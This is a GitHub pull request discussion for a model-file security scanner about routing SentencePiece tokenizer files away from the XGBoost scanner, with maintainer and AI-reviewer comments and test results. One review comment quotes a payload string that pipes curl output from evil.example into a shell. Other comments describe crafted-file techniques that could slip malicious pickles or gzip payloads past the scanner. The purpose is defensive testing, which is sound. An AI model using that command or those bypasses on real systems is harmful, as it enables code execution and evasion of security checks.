Skip to content

fix: keep sentencepiece tokenizers out of xgboost routing#1641

Merged
mldangelo-oai merged 16 commits into
mainfrom
mdangelo/codex/hf-fp-t19-sentencepiece-routing-20260610
Jun 11, 2026
Merged

fix: keep sentencepiece tokenizers out of xgboost routing#1641
mldangelo-oai merged 16 commits into
mainfrom
mdangelo/codex/hf-fp-t19-sentencepiece-routing-20260610

Conversation

@mldangelo-oai

@mldangelo-oai mldangelo-oai commented Jun 11, 2026

Copy link
Copy Markdown
Contributor

Summary

  • Add a bounded, dependency-free SentencePiece ModelProto classifier for strong tokenizer.model identification.
  • Keep XGBoost claiming ambiguous .model inputs, valid binf .model binaries, and XGBoost-shaped malformed controls so fail-closed coverage is preserved.
  • Add focused XGBoost routing regressions plus a changelog entry.

Root Cause

The .model suffix is intentionally absent from extension-only file type validation because it is shared by multiple ecosystems. After content detection returned unknown for Mistral tokenizer.model, ScannerRegistry fell back to extension routing. XGBoostScanner.can_handle() accepted every .model file, so the SentencePiece tokenizer was scanned as an XGBoost binary and emitted inconclusive S1004 / xgboost_binary_structure_unrecognized.

Security Tradeoff

This only suppresses XGBoost routing when the file prefix strongly matches SentencePiece ModelProto pieces: multiple scored piece messages, typed pieces, identity tokens, and . Malformed, truncated, generic protobuf-like, or otherwise ambiguous .model files still reach XGBoost and fail closed. Real XGBoost .model binaries remain scanned.

Validation

Final validation on merge commit 81b6d14:

  • uv run ruff format --check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/ -> pass
  • uv run ruff check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/ -> pass
  • uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/ -> pass
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py --maxfail=1 -q -> 108 passed, 21 skipped
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py tests/scanners/test_lightgbm_scanner.py tests/scanners/test_scanner_registry.py -k "sentencepiece or model or xgboost or extension_format_map" --maxfail=1 -q -> 137 passed, 21 skipped, 162 deselected
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_lightgbm_scanner.py tests/scanners/test_scanner_registry.py -k "model or xgboost or extension_format_map" --maxfail=1 -q -> 29 passed, 162 deselected
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/test_core.py -k "xgboost or sentencepiece" --maxfail=1 -q -> 45 passed, 596 deselected
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/utils/sources/test_huggingface.py -k "xgboost or model" --maxfail=1 -q -> 210 passed, 1 skipped, 57 deselected
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1 -> 17373 passed, 1292 skipped
  • git diff --check origin/main...HEAD -> pass

Note: one earlier pre-merge broad-lane run hit packages/modelaudit-picklescan/tests/test_api.py::test_scan_bytes_warns_when_allowlisted_module_is_unresolved once; the exact test passed on immediate serial rerun, and subsequent full broad-lane reruns passed.

Real-Model QA

Pinned model: mistralai/Mistral-7B-v0.1 @ 27d67f1b5f57dc0953326b2601d68371d40ea8da, file tokenizer.model.

Pre-fix confirmation on main SHA 2f782ba:

  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --stream --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-prefix-stream.json https://huggingface.co/mistralai/Mistral-7B-v0.1/resolve/27d67f1b5f57dc0953326b2601d68371d40ea8da/tokenizer.model -> exit 2, scanner_names=[xgboost], S1004, xgboost_binary_structure_unrecognized.
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-prefix-localdir.json /tmp/modelaudit-t19-mistral-tokenizer-prefix -> exit 2, scanner_names=[xgboost], S1004, xgboost_binary_structure_unrecognized.

Post-fix final validation:

  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --stream --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-merged-stream.json https://huggingface.co/mistralai/Mistral-7B-v0.1/resolve/27d67f1b5f57dc0953326b2601d68371d40ea8da/tokenizer.model -> exit 0, issues=[], scanner_names=[], no S1004, no XGBoost outcome.
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-merged-localdir.json /tmp/modelaudit-t19-mistral-tokenizer-prefix -> exit 0, issues=[], scanner_names=[], no S1004, no XGBoost outcome.

Unrestricted whole-model scans of this Mistral revision can still become inconclusive for separate reasons: the repository contains multi-gigabyte PyTorch shards, so scanner size limits/large-shard handling remain outside this tokenizer.model routing fix.

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. Breezy!

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

@github-actions

github-actions Bot commented Jun 11, 2026

Copy link
Copy Markdown
Contributor

Workflow run and artifacts

Performance Benchmarks

Compared 12 shared benchmarks with a regression threshold of 15%.
Status: 0 regressions, 0 improved, 12 stable, 0 new, 0 missing.
Aggregate shared-benchmark median: 1.427s -> 1.454s (+1.9%).

Workload Benchmark Target Size Files Baseline Current Change Status
direct-malicious-upload tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_direct_malicious_upload malicious_reduce 52 B 1 521.9us 555.2us +6.4% stable
mixed-model-repository tests/benchmarks/test_scan_benchmarks.py::test_scan_release_candidate_repository release-candidate 547.3 KiB 32 480.85ms 496.61ms +3.3% stable
warm-cache-rescan tests/benchmarks/test_scan_benchmarks.py::test_scan_warm_cached_repository_rescan release-candidate 547.3 KiB 32 108.84ms 111.72ms +2.6% stable
nested-payload-review tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_nested_payload_review[nested_raw] nested_raw 78 B 1 583.9us 569.8us -2.4% stable
duplicate-heavy-registry tests/benchmarks/test_scan_benchmarks.py::test_scan_duplicate_registry_snapshot registry-snapshot 915.2 KiB 13 393.82ms 401.19ms +1.9% stable
nested-payload-review tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_nested_payload_review[nested_hex] nested_hex 130 B 1 625.6us 616.0us -1.5% stable
suspicious-pickle-intake tests/benchmarks/test_scan_benchmarks.py::test_scan_suspicious_pickle_intake suspicious-intake 183.8 KiB 4 143.85ms 145.96ms +1.5% stable
padded-multi-stream-upload tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_padded_multi_stream_upload multi_stream_padded 4.1 KiB 1 649.7us 657.8us +1.2% stable
single-checkpoint-preflight tests/benchmarks/test_scan_benchmarks.py::test_scan_single_checkpoint_before_load single_checkpoint.pkl 183.0 KiB 1 72.20ms 71.71ms -0.7% stable
clean-training-checkpoint tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_clean_training_checkpoint safe_large 278.2 KiB 1 110.75ms 110.42ms -0.3% stable
chunked-upload-stream tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_chunked_upload_stream chunked_stream 278.2 KiB 1 113.46ms 113.16ms -0.3% stable
nested-payload-review tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_nested_payload_review[nested_base64] nested_base64 98 B 1 581.7us 580.6us -0.2% stable

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. You're on a roll.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

Independent review of PR #1641

Reviewed exact live head: 81b6d146a0a33d44bcc30e0178bbbb495ce482e9

Findings

P2: valid-looking prefix suppresses malformed SentencePiece tails

_has_strong_sentencepiece_model_proto_prefix() returns after eight recognized pieces without validating the remaining protobuf framing. XGBoostScanner.can_handle() then declines the file and the aggregate scan treats it as a clean unknown file.

Exact control:

payload = _sentencepiece_model_proto() + b"\x12\x80"
Path("tokenizer.model").write_bytes(payload)

The PR head classifies this as SentencePiece, skips XGBoost, and exits 0 with no issues. SentencePiece 0.2.1 rejects the same payload as an invalid ModelProto; main keeps it fail-closed as S1004. Add truncation, invalid-field, and arbitrary-tail cases after the eighth recognized piece. Positive routing must not turn malformed trailing framing into a clean scan.

P2: valid SentencePiece models can omit BOS, EOS, and PAD

The classifier requires three typed identity pieces plus literal <unk>. SentencePiece legitimately supports bos_id=-1, eos_id=-1, and pad_id=-1, leaving only the unknown piece typed specially.

A model produced by SentencePiece 0.2.1 with those settings loads successfully, but the PR classifier returns false, XGBoost claims it, and ModelAudit exits 2 with S1004. Add dependency-produced or official fixtures with BOS/EOS/PAD disabled and a customized unknown-piece string. Local and streaming scans should avoid XGBoost ownership without weakening malformed-input handling.

Validation

The PR's focused tests passed (6 passed) and the full XGBoost scanner suite passed (127 passed, 2 skipped), but neither case above is covered. Both findings should block merge.

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex address that feedback on the exact current head. Preserve positive routing for valid SentencePiece models, retain fail-closed behavior for malformed tails, run dependency-produced local and streaming end-to-end controls, and request a fresh exact-head review after pushing.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 81b6d146a0

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py Outdated
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

Additional pinned SentencePiece QA: baidu/NAVA@16c20287c79c0085ebc8213ca7894701948891f0 routes Wan2.2-TI2V-5B/google/umt5-xxl/spiece.model into the TensorFlow protobuf inconclusive path. Add this file to the real-model ownership regression alongside the existing SentencePiece cases.

Copy link
Copy Markdown
Contributor Author

@codex review exact head 65b64807d2a1800d7d79184f35837bbbe3b2077a

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 65b64807d2

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py Outdated
Comment thread modelaudit/utils/file/detection.py Outdated
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 8da5a6c

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

Pinned QA input: intfloat/multilingual-e5-base@d128750597153bb5987e10b1c3493a34e5a4502a contains two identical 5,069,051-byte sentencepiece.bpe.model files. Current main leaves both inconclusive under TensorFlow protobuf routing. Please validate the current head recognizes SentencePiece explicitly before generic protobuf ownership and retains malformed/truncated SentencePiece controls.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 8da5a6ce54

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py Outdated
Comment thread modelaudit/utils/file/detection.py Outdated
Comment thread modelaudit/utils/file/detection.py Outdated
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 7294d3a

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. You're on a roll.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 395e755

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. What shall we delve into next?

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex add exact real-model QA for BAAI/bge-reranker-base@2cfc18c9415c912f9d8155881c133215df768a70: normal 5,069,051-byte sentencepiece.bpe.model is currently misrouted to TensorFlow protobuf and marked tensorflow_protobuf_routing_incomplete.

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex address these exact-head blockers before merge:

  • P1: semantically malformed SentencePiece protobufs can be accepted as tokenizer-owned and exit 0. Duplicate UNKNOWN pieces and BYTE pieces without trainer_spec.byte_fallback=true are rejected by official SentencePiece but become clean unknown files across direct, ZIP/TAR, and HF paths. If semantic validity cannot be proven dependency-free, keep routing ambiguous/fail closed.
  • P2: valid official models that omit proto2 default unk_id/unk_piece, or have fewer than eight pieces, still route to XGBoost and emit S1004. Add official-loader controls at every intake boundary.
  • P2: the bounded classifier runs five times per direct scan. A valid 4.69 MiB/300k-piece model took 3.0s versus 0.154s on base; cache/carry one stable result.
  • Additional pinned failures on current main: HuggingFaceH4/zephyr-7b-beta@892b3d7a7b1cf10c7a701c60881cd93df615734c/tokenizer.model and mistralai/Mistral-7B-Instruct-v0.1@ec5deb64f2c6e6fa90c1abf74a91d5c93a9669ca/tokenizer.model.

Independent report: /Users/mdangelo/modelaudit-pr-swarm/outputs/pr-1641-independent-review-20260611.md.

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

Additional pinned baseline reproduction for SentencePiece routing:

  • Model: HuggingFaceH4/zephyr-7b-beta
  • HF revision: 892b3d7a7b1cf10c7a701c60881cd93df615734c
  • Selection rank: 240
  • Baseline ModelAudit: 8d6c4864fe2ea833ceaef1b9803d225afb1e8d69
  • Artifact: tokenizer.model
  • Result: XGBoost emitted S1004 File does not start with the expected XGBoost binary signature; the repository scan exited 2 despite zero failed checks.

Please add this exact pinned model to current-head QA and verify tokenizer.model is owned by SentencePiece rather than XGBoost, with renamed/malformed XGBoost controls still fail-closed.

@chatgpt-codex-connector

Copy link
Copy Markdown

Summary

  • Added a Hugging Face remote content-routing guard that fully validates .model files as complete SentencePiece ModelProto tokenizers before generic TensorFlow/CoreML/ONNX protobuf routing can claim them.
  • Added BAAI/bge-reranker-base sentencepiece.bpe.model regression coverage at the exact pinned 5,069,051-byte size, preserving local, aggregate, streaming, and CLI behavior as clean unknown with no XGBoost S1004 false positive.
  • Added Hugging Face selective-download QA for BAAI/bge-reranker-base@2cfc18c9415c912f9d8155881c133215df768a70, asserting the pinned sentencepiece.bpe.model does not route to TensorFlow protobuf and is not downloaded as a model protobuf candidate.
  • Committed changes as 908e801 test: cover BAAI sentencepiece protobuf routing and created a PR with the requested follow-up.

Testing

  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py -k "baai or large_real_sentencepiece" --maxfail=1 -q
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/utils/sources/test_huggingface.py -k "baai_sentencepiece or sentencepiece_bpe" --maxfail=1 -q
  • uv run ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
  • uv run ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
  • uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
  • git diff --check
  • ⚠️ PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --stream --no-cache --max-size 6MB --format json --output /tmp/modelaudit-baai-bge-reranker-base-sentencepiece.json https://huggingface.co/BAAI/bge-reranker-base/resolve/2cfc18c9415c912f9d8155881c133215df768a70/sentencepiece.bpe.model (warning: Hugging Face returned 403 Forbidden in this environment)
  • ⚠️ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1 (warning: a failure marker appeared in the broader xdist lane and the run continued for several minutes; stopped to avoid an indefinite run)

View task →

@chatgpt-codex-connector

Copy link
Copy Markdown

Summary

  • Added an exact-size synthetic QA generator for the pinned BAAI/bge-reranker-base@2cfc18c9415c912f9d8155881c133215df768a70/sentencepiece.bpe.model case, producing a 5,069,051-byte SentencePiece BPE-shaped model without committing a large binary fixture. tests/scanners/test_xgboost_scanner.pyL142-L160
  • Added end-to-end routing coverage asserting the pinned-size SentencePiece model is recognized by SentencePiece ownership, remains unknown to generic format detection, avoids tensorflow_protobuf_routing_incomplete, and does not route to XGBoost/S1004 across direct, aggregate, streaming, and CLI scans. tests/scanners/test_xgboost_scanner.pyL1980-L2023
  • Committed the change as 430099d test: cover BAAI sentencepiece routing and created a PR with the recorded summary/validation.

Testing

  • uv run ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
  • uv run ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
  • uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py -k "baai_bge_reranker_base_sentencepiece_bpe_model or large_real_sentencepiece_model_shape or malformed_tail or capped_sentencepiece" --maxfail=1 -q
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1 failed at tests/test_cli.py::test_cli_report_writers_reject_symlinked_parent_directory because the test expected exit code 2 but got 0; a focused serial rerun reproduced the same failure.
  • PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/test_cli.py::test_cli_report_writers_reject_symlinked_parent_directory -q reproduced the same exit-code assertion failure.

View task →

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 00de898a210eb6ed1b41d4c074a4d7567baa0c28\n\nFollow-up pushed for SentencePiece/XGBoost routing hardening. Local validation passed with four-worker broad pytest: 17433 passed, 1292 skipped; Ruff format/check and mypy are clean.

@mldangelo-oai mldangelo-oai requested a review from mldangelo June 11, 2026 10:20

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 00de898a21

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py Outdated
Comment thread modelaudit/scanners/compressed_scanner.py Outdated
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

Independent review of exact head 00de898a210eb6ed1b41d4c074a4d7567baa0c28 found four blockers:

  1. P1: malformed SentencePiece models can exit clean. Ordinary piece text uniqueness is not validated. A model containing duplicate "dup" pieces is classified strong even though SentencePiece 0.2.1 rejects it as already defined. Base routes it to XGBoost/S1004 and exits 2; head returns unknown/success with no issues across direct, directory, streaming, ZIP, TAR, and CLI scans. Strong ownership needs official-equivalent uniqueness validation or fail-closed routing.
  2. P1: bare compressed models lose PyTorch binary security analysis. Returning an empty suffix for wrappers such as model.gz makes generic extracted binary payloads extensionless/unknown. A payload containing os.system("curl https://evil.example/p | sh") changes from base pytorch_binary S902/exit 1 to head unknown/clean/exit 0; a blacklist marker similarly changes from critical to clean. Preserve .bin fallback unless SentencePiece ownership is positively established.
  3. P2: the nominal 10 MiB ownership probe reads entire oversized files repeatedly. A 14,700,134-byte model was fully read in 120,027 reads, and one direct scan_file invoked classification four times. Enforce a real byte/work budget and cache classification without treating unread tails as strong.
  4. P3: legal repeated TrainerSpec fields are treated as malformed. Proto2 merges repeated occurrences of a singular message field, but the parser replaces prior state. A valid model whose two TrainerSpec occurrences split required fields loads in SentencePiece 0.2.1, while head fails direct, streaming, ZIP, TAR, and CLI scans as sentencepiece_model_proto_routing_incomplete.

Validation: XGBoost had 186 passes/2 skips; focused core 61 passes; registry 22; Hugging Face source 211; compressed scanner 73 passes excluding one environment cache failure that reproduces on base; fixture hygiene 7. Three authentic models loaded with SentencePiece 0.2.1 and passed streaming CLI QA. Exact-head CI is fully green, but two current review threads remain unresolved and both P1 regressions block merge.

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 6dab64eec24a874b26836ff29d388b963ed567aa

Follow-up pushed for the two exact-head Codex P2s: bounded SentencePiece ownership reads without XGBoost false positives, and restored raw-binary routing for bare compressed wrappers. Local validation passed: Ruff format/check, mypy, focused XGBoost/compressed/filetype/core/archive slices, and broad four-worker pytest (17440 passed, 1292 skipped).

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. You're on a roll.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head a1b7f7871ec1bc472efe5024ffc8d6996ea63722

Follow-up pushed for the remaining bounded SentencePiece ownership thread. Local validation passed on this exact head: Ruff format/check, mypy, focused SentencePiece/XGBoost/compressed regressions, and broad four-worker pytest (17440 passed, 1292 skipped).

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: a1b7f7871e

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py Outdated
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

Independent review of exact head a1b7f7871ec1bc472efe5024ffc8d6996ea63722 found four blockers:

  1. P1: unknown protobuf fields can carry unscanned payloads while suppressing fallback scanning. The SentencePiece classifier skips unknown top-level fields and still returns strong ownership. A legal length-delimited unknown field containing a malicious protocol-0 pickle loads successfully in SentencePiece 0.2.1, then scans clean across direct, aggregate, streaming, ZIP, TAR, and gzip routes. Base fails closed through XGBoost/S1004.
  2. P1: tokenizer.gz bypasses PyTorch-binary security checks. Filename-only wrapper exemptions make tokenizer/spiece/sentencepiece gzip payloads extensionless. Identical binary content with blacklist marker CONFIDENTIAL is detected as S1001 in model.gz and on base tokenizer.gz, but current-head tokenizer.gz routes unknown and clean.
  3. P2: repeated TrainerSpec messages do not follow protobuf merge semantics. Splitting valid fields across two field-2 occurrences yields a model SentencePiece 0.2.1 loads and protobuf merges to the original, but head classifies it malformed and reports XGBoost S1004 across direct/aggregate/stream/archive routes.
  4. P2: the 10 MiB ownership cap is applied four times per direct scan. Instrumentation saw four full classifier invocations, approximately 40 MiB of ownership reads/parses before scanning. Compute once and propagate the route result.

Validation: 11 malformed/duplicate controls, 70 SentencePiece/compressed tests, 187 XGBoost tests with 2 skips, 211 HF selection tests, and 79 compressed tests passed. Real SentencePiece loading and protobuf merge behavior were verified. Exact-head CI is fully green, but one current thread matches the P1 unknown-field bypass. The two P1 clean-scan regressions block merge.

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 3b2287c87e75b8c71b7952ba2b05b64b71c7b2ee

Follow-up pushed for the P1 unknown top-level SentencePiece field issue. Local validation passed on this exact head: Ruff format/check, mypy, focused SentencePiece/XGBoost/archive/core slices, and broad four-worker pytest (17452 passed, 1292 skipped).

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 6660ef8b4c8d0d7bd26575df627a5036df833657

Follow-up pushed for the remaining exact-head review blockers: tokenizer-like gzip raw binaries now route inner payloads to PyTorch-binary unless the decompressed payload is a SentencePiece candidate, repeated TrainerSpec messages merge under proto2 semantics, and SentencePiece ownership probes are cached by stable file identity plus bounded content fingerprint. Local validation passed on this exact head: Ruff check/format-check, mypy, focused SentencePiece/XGBoost/compressed/archive/core slices, and broad four-worker pytest (17458 passed, 1292 skipped).

@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 6660ef8b7eba063b660608245922bb1a95128321

Corrected exact-head request for the just-pushed follow-up. Local validation on this head: Ruff check/format-check, mypy, focused SentencePiece/XGBoost/compressed/archive/core slices, and broad four-worker pytest (17458 passed, 1292 skipped).

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 6660ef8b7e

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head ac133a0eecddfa20459d273b095004f729b7915e

Follow-up pushed for the streamed SentencePiece wire-type P2. Fields 2-5 now require length-delimited wire type in the streaming classifier, with small malformed-tail and >10MiB streaming regressions. Local validation on this head: Ruff check/format-check, mypy, full XGBoost/compressed focused files, ZIP/TAR/core routing selections, and broad four-worker pytest (17467 passed, 1292 skipped).

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. More of your lovely PRs please.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

…dangelo/codex/hf-fp-t19-sentencepiece-routing-20260610

# Conflicts:
#	modelaudit/utils/file/detection.py
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head 1eae3a83e6eed09c1a50bb99a9a7958b39076367

Maintainer follow-up pushed after merging current main: malformed SentencePiece-shaped .proto candidates now fail closed as sentencepiece_model_proto_routing_incomplete, while valid tokenizer .proto files remain clean unknown. Local validation on this exact head: focused SentencePiece/XGBoost regressions, adjacent XGBoost/compressed/fixture tests, Ruff check/format-check, mypy, and whitespace check.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 1eae3a83e6

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread modelaudit/utils/file/detection.py Outdated
@mldangelo-oai

Copy link
Copy Markdown
Contributor Author

@codex review exact head bb2ace43e49ebdca370aca029d2373a405cd6941

Follow-up pushed for the exact-head .proto P2: strong SentencePiece .proto tokenizers now return clean unknown before generic protobuf routing, while malformed .proto candidates still fail closed. Local validation on this exact head: targeted .proto regression tests, adjacent XGBoost/compressed/fixture tests, Ruff check/format-check, mypy, whitespace check, fixer sub-agent confirmation, and independent reviewer re-review with no findings.

@chatgpt-codex-connector

Copy link
Copy Markdown

Codex Review: Didn't find any major issues. Chef's kiss.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

@mldangelo-oai mldangelo-oai merged commit 5ac9efc into main Jun 11, 2026
29 checks passed
@mldangelo-oai mldangelo-oai deleted the mdangelo/codex/hf-fp-t19-sentencepiece-routing-20260610 branch June 11, 2026 17:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant